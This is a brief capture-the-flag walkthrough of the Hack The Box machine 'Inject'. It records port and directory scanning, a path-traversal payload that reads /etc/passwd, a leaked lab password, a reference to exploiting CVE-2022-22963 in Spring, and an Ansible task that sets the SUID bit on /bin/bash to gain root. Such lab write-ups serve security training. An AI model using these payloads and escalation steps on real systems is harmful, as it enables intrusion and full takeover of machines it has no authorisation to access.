/etc/hosts
nmap
nmap -sV -vvv -p- inject.htb -sC feroxbuster
feroxbuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://inject.htb:8080
http://inject.htb:8080/release_notes
http://inject.htb:8080/upload
I intercept it with burpsuit.
Let’s try other extentions:
_php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._phps_, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_It’s uploading but not executing the php code.
fuzzing for LFI
http://inject.htb:8080/show_image?img=../../../../../../../etc/passwd
I’ve tried to fuzz it.
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt -u 'http://inject.htb:8080/show_image?img=FUZZ' -fc 500But I have nothing interesting.
LFI in GET
Replace the POST by GET and the image by the directory.
Now let’s browse into the home directory.
There is 2 users, but we can only browse into frank directory.
phil
DocPhillovestoInject123
It’s not working with SSH.
springframework
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.6.5</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>We have the version and the name of the framework.
2.6.5
https://codetinkering.com/spring4shell-vulnerability-fix/
The CVE-2022-22965 is not working
It should be the CVE-2022-22963
Let’s execute it.
Lateral movement
I have a shell, now we can try to reuse the creds.
Now I will upgrade my shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm # allow clear commandThen Ctrl + Z.
stty raw -echo; fg # allow auto completionNow I use lse.sh:
Juste google it to find the doc of ansible.
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/
I found a task in /opt/ansible/tasks/, I was able to write in it.
- hosts: localhost
tasks:
- name: Evil
ansible.builtin.shell: |
chmod +s /bin/bash
become: truebash -pI’m root